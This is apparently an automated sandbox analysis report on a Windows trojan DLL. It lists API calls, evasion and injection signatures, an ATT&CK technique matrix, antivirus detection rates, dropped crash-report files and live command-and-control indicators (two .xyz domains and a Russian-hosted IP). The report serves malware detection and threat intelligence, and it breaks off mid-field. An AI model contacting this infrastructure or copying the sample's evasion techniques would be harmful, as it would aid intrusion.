          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130EE374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC130EE374
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130F6DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFC130F6DA4
          Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC130EBC0C
          Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFC130EE374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC130EE374
          Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFC130F6DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFC130F6DA4
          Source: C:\Windows\System32\rundll32.exe Code function: 8_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFC130EBC0C
          Source: C:\Windows\System32\rundll32.exe Code function: 8_2_00007FFC130EE374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFC130EE374
          Source: C:\Windows\System32\rundll32.exe Code function: 8_2_00007FFC130F6DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFC130F6DA4

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.250.148.35 443
          Source: C:\Windows\System32\regsvr32.exe Domain query: gigimas.xyz
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1
          Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130F65F0 cpuid 0_2_00007FFC130F65F0
          Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130FED60 CreateNamedPipeA,0_2_00007FFC130FED60
          Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC130EBB08 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFC130EBB08

          Stealing of Sensitive Information

          Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | 1 DLL Side-Loading | 112 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 12 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 112 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Regsvr32 | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          [Behavior graph: ID 752975, Sample: pzG0rkIchr.dll, Start date: 24/11/2022, Architecture: WINDOWS, Score: 92]

          Source | Detection | Scanner | Label | Link
          pzG0rkIchr.dll | 57% | Virustotal | | Browse
          pzG0rkIchr.dll | 73% | ReversingLabs | Win64.Trojan.Tnega |

          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          gigimas.xyz | 14% | Virustotal | | Browse

          Source | Detection | Scanner | Label | Link
          https://gigimas.xyz | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz | 11% | Virustotal | | Browse
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe |
          https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe |
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe |
          http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe |
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe |
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe |
          https://gigimas.xyz/index.html9Pu/Jl | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz/index.html5F | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz/index.html | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz/index.htmlT | 0% | Avira URL Cloud | safe |
          https://http://Mozilla/5.0 | 0% | Avira URL Cloud | safe |
          https://gigimas.xyzhttps://reaso.xyz | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz/index.htmlm | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz:443/index.htmlY_ | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz:443/index.html | 0% | Avira URL Cloud | safe |
          https://gigimas.xyz/ | 0% | Avira URL Cloud | safe |
          https://reaso.xyz | 100% | Avira URL Cloud | malware |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          gigimas.xyz | 185.250.148.35 | true | true | | unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://gigimas.xyzloaddll64.exe, 00000000.00000003.631018067.0000020164340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmptrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          https://sectigo.com/CPS0pzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0pzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          http://ocsp.sectigo.com0pzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          https://gigimas.xyz/index.html9Pu/Jlregsvr32.exe, 00000003.00000003.466312748.00000000007DD000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://gigimas.xyz/index.html5Fregsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://http://Mozilla/5.0loaddll64.exe, 00000000.00000003.631032238.0000020164342000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641554871.00000000020E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357262173.0000017B374A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357492545.00000201A4292000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#pzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          https://gigimas.xyz/index.htmlregsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596506826.000000000078D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://gigimas.xyz/index.htmlTregsvr32.exe, 00000003.00000002.641214444.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596466270.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531265696.00000000007C6000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#pzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          https://gigimas.xyzhttps://reaso.xyzregsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://gigimas.xyz/index.htmlmregsvr32.exe, 00000003.00000002.641004710.0000000000785000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#pzG0rkIchr.dllfalse
          • URL Reputation: safe
          unknown
          https://gigimas.xyz/regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.595788178.0000000000815000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641484903.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596407001.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.466249755.00000000007A9000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://gigimas.xyz:443/index.htmlY_regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://reaso.xyzregsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          https://gigimas.xyz:443/index.htmlregsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
          185.250.148.35 | gigimas.xyz | Russian Federation | | 48430 | FIRSTDC-ASRU | true
          IP
          192.168.2.1
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:752975
          Start date and time:2022-11-24 05:29:36 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 27s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:pzG0rkIchr.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:25
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal92.troj.evad.winDLL@19/8@4/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 78% (good quality ratio 69.5%)
          • Quality average: 59.8%
          • Quality standard deviation: 32.6%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 90
          • Number of non-executed functions: 104
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.65.92
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          No simulations
          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
          185.250.148.35 | 4R5qvHtzCd.dll | Get hash | malicious | Browse |
           | DlLOgYHCSH.dll | Get hash | malicious | Browse |
           | igzTVM2e0E.dll | Get hash | malicious | Browse |
           | pzG0rkIchr.dll | Get hash | malicious | Browse |
           | R1yf6aNGRb.dll | Get hash | malicious | Browse |
           | 4R5qvHtzCd.dll | Get hash | malicious | Browse |
           | 5120184.dll | Get hash | malicious | Browse |
           | 5130000.dll | Get hash | malicious | Browse |
           | Shrjdjykdhjt.dll | Get hash | malicious | Browse |
           | Shrjdjykdhjt.dll | Get hash | malicious | Browse |

          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
          gigimas.xyz | 4R5qvHtzCd.dll | Get hash | malicious | Browse | 185.250.148.35
           | DlLOgYHCSH.dll | Get hash | malicious | Browse | 185.250.148.35
           | igzTVM2e0E.dll | Get hash | malicious | Browse | 185.250.148.35
           | pzG0rkIchr.dll | Get hash | malicious | Browse | 185.250.148.35
           | R1yf6aNGRb.dll | Get hash | malicious | Browse | 185.250.148.35
           | 4R5qvHtzCd.dll | Get hash | malicious | Browse | 185.250.148.35
           | 5120184.dll | Get hash | malicious | Browse | 185.250.148.35
           | 5130000.dll | Get hash | malicious | Browse | 185.250.148.35
           | Shrjdjykdhjt.dll | Get hash | malicious | Browse | 185.250.148.35
           | Shrjdjykdhjt.dll | Get hash | malicious | Browse | 185.250.148.35

          Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
          FIRSTDC-ASRU | 4R5qvHtzCd.dll | Get hash | malicious | Browse | 185.250.148.35
           | DlLOgYHCSH.dll | Get hash | malicious | Browse | 185.250.148.35
           | igzTVM2e0E.dll | Get hash | malicious | Browse | 45.67.34.172
           | pzG0rkIchr.dll | Get hash | malicious | Browse | 185.250.148.35
           | R1yf6aNGRb.dll | Get hash | malicious | Browse | 185.250.148.35
           | 4R5qvHtzCd.dll | Get hash | malicious | Browse | 185.250.148.35
           | Setup.exe | Get hash | malicious | Browse | 185.231.205.200
           | Cracked.exe | Get hash | malicious | Browse | 185.231.205.200
           | file.exe | Get hash | malicious | Browse | 45.67.35.17
           | 5mpQrt0teP.exe | Get hash | malicious | Browse | 93.185.166.95
           | vZu7WohZKt.exe | Get hash | malicious | Browse | 93.185.166.200
           | vZu7WohZKt.exe | Get hash | malicious | Browse | 93.185.166.200
           | 221019-nwad3afdb7_pw_infected.zip | Get hash | malicious | Browse | 5.252.23.34
           | hibUp3UOKx.exe | Get hash | malicious | Browse | 45.67.35.251
           | kiFWEWjTPk.exe | Get hash | malicious | Browse | 37.44.208.80
           | xx.dll | Get hash | malicious | Browse | 45.67.34.245
           | xx.dll | Get hash | malicious | Browse | 45.67.34.245
           | QfeGQnP2s8.exe | Get hash | malicious | Browse | 185.250.149.159
           | cXRM6Pj5DY.exe | Get hash | malicious | Browse | 5.252.23.112
           | AB2B84A49E97AC78BE55918EB9B1E91A69FC237BCD212.exe | Get hash | malicious | Browse | 5.252.23.112
                              No context
                              No context
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.7599332074807373
                              Encrypted:false
                              SSDEEP:96:YImFlZZFiWpJPnyijs55P7HfgpXIQcQdc6/RcENcw3VXaXz+HbHgSQgJPbJIDV9+:nm3FiYJKgHz9XpjEI/u7sGOS274ltC
                              MD5:4D7AD4D16E977190A93A4217F65D5552
                              SHA1:4C633364E29B27CC5520425ACF90D722D0615F55
                              SHA-256:538A208795EC006468C02E86FF3F447417F354986183D6CF0BB1202C6DCD6B33
                              SHA-512:E9A45DA51EF7DB62A595D2FA006C1FD4E4E2B307822E7AED13001CA6517DBFDA7B4D9ECB4B77B11784C4F5ADA883C7DB69F9E028D3C6D9B95023BD486973B102
                              Malicious:false
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.7588806812185113
                              Encrypted:false
                              SSDEEP:96:EtaFiDJPnycjs551DW9SspXIQcQQGc6bcEKcw3UUeXaXz+HbHgSQgJPbph88WpOX:sciDJKWH1fQ4Ucjpe/u7sGOS274lt9
                              MD5:970AE762D984AB0562EF2DDEE4F7F71C
                              SHA1:BB145548E992EC8183CD51D92E4C3494DE7B0EC1
                              SHA-256:402CD5EB9A3A996EB553A8C5485895A3AD576D1556CCCB08E20366B7A3C00A40
                              SHA-512:794C6926A380144449AA7C24BA1407D67EA8A41F89ABAD333313D324799DBC1F4C76D52F49A91D112AF60FCA87CA01F12F0F7648B4AAB095A5AB367A8DDE84AA
                              Malicious:false
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8606
                              Entropy (8bit):3.6917131740684326
                              Encrypted:false
                              SSDEEP:192:Rrl7r3GLNibXpiH6YmObgmf9lpSDUf9CpDz89bv7QfAFm:RrlsNiLpiH6Yvbgmf9lpSWv8fv
                              MD5:A25026BF04BD3F85B66322DD4EACE463
                              SHA1:3E6F42AACBDC7749C351F4040836974F0FE849E8
                              SHA-256:EF29167FAC14085CEDC2B51E3DD871909F41CF22CD799EE08F16E10BC5F25340
                              SHA-512:7AF918F7B179540C5C0250F8E7C698AEFA2B7873F29B792D886EA8256C447CA561DA47EC2668FB3972F8F954F438D84DF8C98E8C447248C17C7FD927D4793FD3
                              Malicious:false
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4852
                              Entropy (8bit):4.453732860738506
                              Encrypted:false
                              SSDEEP:48:cvIwSD8zs/JgtBI9C0Wgc8sqYjHs8fm8M4JCXCODFSoyq8vhObZESC5S6d:uITfhEtgrsqYTRJeWqVv6d
                              MD5:36514A65B9F12B58AFD0BBEC14BB306B
                              SHA1:708D342C0B5E7C27C165196A66BA72199935C035
                              SHA-256:1E2FDEB64300A379966992E05CDCED721176C203B2AEA77D8521699282520391
                              SHA-512:0042E849F66066FE1C66E48516FCD7B735C49DB80A33C73C025965CC1544002AD8246D1716241A37BD1855EF92F2DB6540A3373E1D7E89B58447CAD2420BA6A9
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1794161" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Thu Nov 24 13:31:29 2022, 0x1205a4 type
                              Category:dropped
                              Size (bytes):57126
                              Entropy (8bit):1.6752029810543265
                              Encrypted:false
                              SSDEEP:192:QRENUeRlXOC5Ky21na9OBQpyomWlAgh0l:XeC0VQ9Oupy
                              MD5:15A22FD2F4CA8ECE4C09E779E8BF5301
                              SHA1:CF2A33C45D5845C636A662FBC221FF128EFFE3D2
                              SHA-256:32AE357A2D002F95865AC8D24FA48BEEC756DF4547D071DA783E4676C7DE6702
                              SHA-512:532611BDCDEE7F036330CAEB750CA8681D325436E10FF99A3F12B55C97ABC60D206C7105F426E3E76A10F88F9B2EE8D5C000E752DEDA295729A94B0DC84161D6
                              Malicious:false
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8528
                              Entropy (8bit):3.6927747114398133
                              Encrypted:false
                              SSDEEP:192:Rrl7r3GLNiXByMiO6Ymf7lay5gmfQeSiR9CprRA89bNz14fsDvm:RrlsNixNiO6YOngmfQeSh9Nzafl
                              MD5:62C5858D004322A987DA836EAAFCF3D0
                              SHA1:92F1D11A4FFAF0BC607AD9D80B0733B9C0AF776C
                              SHA-256:E4ADEDF6BDB44F7A887C8FAEFA13E8932F54043F510FC6E6F6C9AD763A3D5E0E
                              SHA-512:2244B303A7B773AE32265E693A04F0DA0A6A1BD91CF90B58BD31F51770ECA29D0D7A8DEB1E80090473442B0E03FCDBAB3F6A377970F38D5F9211160FD7739682
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>6136</Pid>..
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4733
                              Entropy (8bit):4.475037901948798
                              Encrypted:false
                              SSDEEP:48:cvIwSD8zsKJgtBI9C0Wgc8sqYjK8fm8M4JCXCO/Flyq85m2knZESC5Sgd:uITfYEtgrsqYLJCTnVvgd
                              MD5:B4E9E6B35D1BFAE0CB99ADA1D8BA4FB0
                              SHA1:000AD3F75949E7EB512EA021578BBCF408B9AB13
                              SHA-256:256C84BFDE399833C36F0B05ED98CD72BC1507AE7C28D6DE773C33253673138B
                              SHA-512:A55F7E52226C64C2A45E23FA853E1DA40F9D8DC41F8488A1F634AEB597EE0EE61056CC453C7AAA61B35751E720B0504EA500D7A0FE7652D988AC45BBACE39349
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1794162" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Nov 24 13:31:09 2022, 0x1205a4 type
                              Category:dropped
                              Size (bytes):31470
                              Entropy (8bit):2.120966153641428
                              Encrypted:false
                              SSDEEP:96:5U8oyl8/7PSDKwNULtCTy+poi7C5VZ5ro8189EzF5oFPV4sGvTWIXmIf4ywMGVl9:FoyWocCTyOC5KwzzoAtkUWa
                              MD5:53678B23171E44FF503435C4B6EE4E82
                              SHA1:CBBF51D8D6EC4215E00C23AE2CB2DDEE3D01CF47
                              SHA-256:EBE61E60D7251461BAA6A84830EBD1CA17739D2616F7DB1BD0555EBCE7BE7F4A
                              SHA-512:EAFB2D40ACE89BDF7B02C147E9C69D9FADEBD0000C1260C46078197DA96E561B571A5BEC7D653A614A8BAEE730299C8F78C5FA7380557B3F3D86542FA0324D6A
                              Malicious:false
                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Entropy (8bit):6.637392883592079
                              TrID:
                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                              • Win64 Executable (generic) (12005/4) 10.17%
                              • Generic Win/DOS Executable (2004/3) 1.70%
                              • DOS Executable Generic (2002/1) 1.70%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                              File name:pzG0rkIchr.dll
                              File size:290568
                              MD5:d6ef4778f7dc9c31a0a2a989ef42d2fd
                              SHA1:5dad8394ef37d5a006674589754f7a3187d303b1
                              SHA256:54de1f2c26a63a8f6b7f8d5de99f8ebd4093959ab07f027db1985d0652258736
                              SHA512:997b57424364ff661d80ca6efc5b7e91f2204d1ed7c4d784ee7d6134bc06952c993de038d6a25c71a7949b08ddd8cc5d167f8c753379f69ee1b6b49342fafa63
                              SSDEEP:6144:wHyvumb1p7CC8VoxOJbceNOHI2Tse2RTggR/Znv+yit:Smbrgu2so2TVwcK/ZnG/t
                              TLSH:ED54BF41F3D904A6D9138D3D8857562BEBF13C212214DA5F8B50C36A6F37BA1E739B22
                              Icon Hash:74f0e4ecccdce0e4
                              Entrypoint:0x18000b6ec
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x180000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x62C42DD7 [Tue Jul 5 12:25:59 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:4270d9bbb54b179372d82277269282e6
                              Signature Valid:true
                              Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                              Signature Validation Error:The operation completed successfully
                              Error Number:0
                              Not Before, Not After
